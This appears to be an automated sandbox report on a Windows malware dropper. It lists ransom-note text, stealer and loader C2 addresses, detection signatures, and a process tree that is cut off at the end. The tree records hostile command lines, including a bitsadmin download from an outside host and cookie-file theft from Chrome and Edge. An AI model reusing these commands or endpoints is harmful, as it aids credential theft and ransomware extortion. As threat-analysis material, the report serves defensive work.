Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    226s
  • max time network
    393s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-08-2021 23:00

General

  • Target

    8 (15).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-jTbSQT8ApY Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0324gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-jTbSQT8ApY

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

redline

Botnet

56k_TEST

C2

45.14.49.117:14251

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 60 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 56 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 33 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:996
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1392
      • C:\Users\Admin\AppData\Local\Temp\8 (15).exe
        "C:\Users\Admin\AppData\Local\Temp\8 (15).exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3064
          • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\setup_install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:4052
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_1.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_1.exe
                sonia_1.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2108
                • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_1.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_1.exe" -a
                  6⤵
                    PID:2008
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_2.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3200
                • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_2.exe
                  sonia_2.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:3964
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_3.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3588
                • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_3.exe
                  sonia_3.exe
                  5⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:2244
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 952
                    6⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4752
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_4.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2316
                • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_4.exe
                  sonia_4.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3740
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_5.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2280
                • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_5.exe
                  sonia_5.exe
                  5⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  PID:1300
                  • C:\Users\Admin\Documents\vrgr733Nk3sdxA8_9Ez4Plh6.exe
                    "C:\Users\Admin\Documents\vrgr733Nk3sdxA8_9Ez4Plh6.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4944
                    • C:\Users\Admin\Documents\vrgr733Nk3sdxA8_9Ez4Plh6.exe
                      C:\Users\Admin\Documents\vrgr733Nk3sdxA8_9Ez4Plh6.exe
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4148
                  • C:\Users\Admin\Documents\eOXuWNgnwRs9bRrH00H2eDTr.exe
                    "C:\Users\Admin\Documents\eOXuWNgnwRs9bRrH00H2eDTr.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4932
                  • C:\Users\Admin\Documents\UHCJvFn8Sk73gZSKLEuJP67n.exe
                    "C:\Users\Admin\Documents\UHCJvFn8Sk73gZSKLEuJP67n.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4976
                  • C:\Users\Admin\Documents\dVC108hdPce1dWwNg9V3eGPY.exe
                    "C:\Users\Admin\Documents\dVC108hdPce1dWwNg9V3eGPY.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4988
                  • C:\Users\Admin\Documents\FlKIB7E0sw9hD5bLi4PwDSVq.exe
                    "C:\Users\Admin\Documents\FlKIB7E0sw9hD5bLi4PwDSVq.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:5000
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:1328
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:5256
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:4540
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:5336
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 5000 -s 1540
                      7⤵
                      • Suspicious use of NtCreateProcessExOtherParentProcess
                      • Program crash
                      PID:5148
                  • C:\Users\Admin\Documents\6uqtOtBqyQ_XQqhOgLb7FiVz.exe
                    "C:\Users\Admin\Documents\6uqtOtBqyQ_XQqhOgLb7FiVz.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:5076
                    • C:\Users\Admin\Documents\6uqtOtBqyQ_XQqhOgLb7FiVz.exe
                      "C:\Users\Admin\Documents\6uqtOtBqyQ_XQqhOgLb7FiVz.exe"
                      7⤵
                      • Modifies data under HKEY_USERS
                      PID:6672
                  • C:\Users\Admin\Documents\OGwpbYV2Z5_Fe7bwycUdpXqX.exe
                    "C:\Users\Admin\Documents\OGwpbYV2Z5_Fe7bwycUdpXqX.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:5068
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 660
                      7⤵
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:500
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 664
                      7⤵
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4812
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 648
                      7⤵
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4220
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 716
                      7⤵
                      • Program crash
                      PID:4604
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1068
                      7⤵
                      • Executes dropped EXE
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5040
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1260
                      7⤵
                      • Program crash
                      PID:3572
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1296
                      7⤵
                      • Program crash
                      PID:5184
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1448
                      7⤵
                      • Suspicious use of NtCreateProcessExOtherParentProcess
                      • Program crash
                      PID:5952
                  • C:\Users\Admin\Documents\fZ3a1ds7UxPUYQX0h_fTaKyA.exe
                    "C:\Users\Admin\Documents\fZ3a1ds7UxPUYQX0h_fTaKyA.exe"
                    6⤵
                      PID:5040
                    • C:\Users\Admin\Documents\XGJAPNkjEo2NZdB3FylzoUGx.exe
                      "C:\Users\Admin\Documents\XGJAPNkjEo2NZdB3FylzoUGx.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5016
                    • C:\Users\Admin\Documents\EJrkfVugVaSK81ZquCvGlroh.exe
                      "C:\Users\Admin\Documents\EJrkfVugVaSK81ZquCvGlroh.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4108
                      • C:\Users\Admin\Documents\EJrkfVugVaSK81ZquCvGlroh.exe
                        C:\Users\Admin\Documents\EJrkfVugVaSK81ZquCvGlroh.exe
                        7⤵
                        • Executes dropped EXE
                        PID:5820
                    • C:\Users\Admin\Documents\bZabEsZD5l2LFPVdovYaq7q0.exe
                      "C:\Users\Admin\Documents\bZabEsZD5l2LFPVdovYaq7q0.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2348
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4520
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                        7⤵
                          PID:6700
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                          7⤵
                            PID:4716
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                            7⤵
                              PID:6516
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                              7⤵
                                PID:6376
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                7⤵
                                  PID:7128
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                  7⤵
                                  • Checks for any installed AV software in registry
                                  PID:6676
                                • C:\Windows\SysWOW64\bitsadmin.exe
                                  "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                  7⤵
                                  • Download via BitsAdmin
                                  PID:1164
                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:2000
                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                  7⤵
                                    PID:5512
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                    7⤵
                                      PID:4712
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                      7⤵
                                        PID:7492
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                        7⤵
                                          PID:2144
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                          7⤵
                                            PID:8080
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                            7⤵
                                              PID:6424
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                              7⤵
                                                PID:6952
                                                • C:\Windows\system32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                  8⤵
                                                    PID:6792
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:7376
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5640
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:7796
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:8004
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu376E.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5456
                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                            7⤵
                                                              PID:7348
                                                          • C:\Users\Admin\Documents\UgZ1GWQ30uoNbCDbItnBiFDf.exe
                                                            "C:\Users\Admin\Documents\UgZ1GWQ30uoNbCDbItnBiFDf.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:2008
                                                            • C:\Users\Admin\AppData\Roaming\8131070.exe
                                                              "C:\Users\Admin\AppData\Roaming\8131070.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1312
                                                            • C:\Users\Admin\AppData\Roaming\4231225.exe
                                                              "C:\Users\Admin\AppData\Roaming\4231225.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4768
                                                          • C:\Users\Admin\Documents\KAjZWkGqdHv4uCWMD7DXQwzO.exe
                                                            "C:\Users\Admin\Documents\KAjZWkGqdHv4uCWMD7DXQwzO.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4116
                                                            • C:\Users\Admin\AppData\Local\Temp\is-1271K.tmp\KAjZWkGqdHv4uCWMD7DXQwzO.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-1271K.tmp\KAjZWkGqdHv4uCWMD7DXQwzO.tmp" /SL5="$801AA,138429,56832,C:\Users\Admin\Documents\KAjZWkGqdHv4uCWMD7DXQwzO.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks processor information in registry
                                                              • Modifies data under HKEY_USERS
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4168
                                                              • C:\Users\Admin\AppData\Local\Temp\is-PPT00.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-PPT00.tmp\Setup.exe" /Verysilent
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                PID:5224
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  PID:5352
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    PID:6776
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    10⤵
                                                                      PID:6248
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      10⤵
                                                                      • Executes dropped EXE
                                                                      PID:6504
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      10⤵
                                                                      • Executes dropped EXE
                                                                      PID:6976
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                    9⤵
                                                                      PID:5388
                                                                      • C:\Users\Admin\AppData\Roaming\5210744.exe
                                                                        "C:\Users\Admin\AppData\Roaming\5210744.exe"
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:5964
                                                                      • C:\Users\Admin\AppData\Roaming\1197537.exe
                                                                        "C:\Users\Admin\AppData\Roaming\1197537.exe"
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        PID:5976
                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          PID:5536
                                                                      • C:\Users\Admin\AppData\Roaming\2313888.exe
                                                                        "C:\Users\Admin\AppData\Roaming\2313888.exe"
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:5904
                                                                      • C:\Users\Admin\AppData\Roaming\8473479.exe
                                                                        "C:\Users\Admin\AppData\Roaming\8473479.exe"
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:4860
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Checks whether UAC is enabled
                                                                      • Drops file in Program Files directory
                                                                      PID:5428
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:5468
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6EHLH.tmp\GameBoxWin32.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-6EHLH.tmp\GameBoxWin32.tmp" /SL5="$20308,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                        10⤵
                                                                          PID:5596
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4F0LB.tmp\Daldoula.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4F0LB.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                            11⤵
                                                                            • Drops file in Drivers directory
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:6364
                                                                            • C:\Program Files\Microsoft Office\WPZCFJCWOQ\ultramediaburner.exe
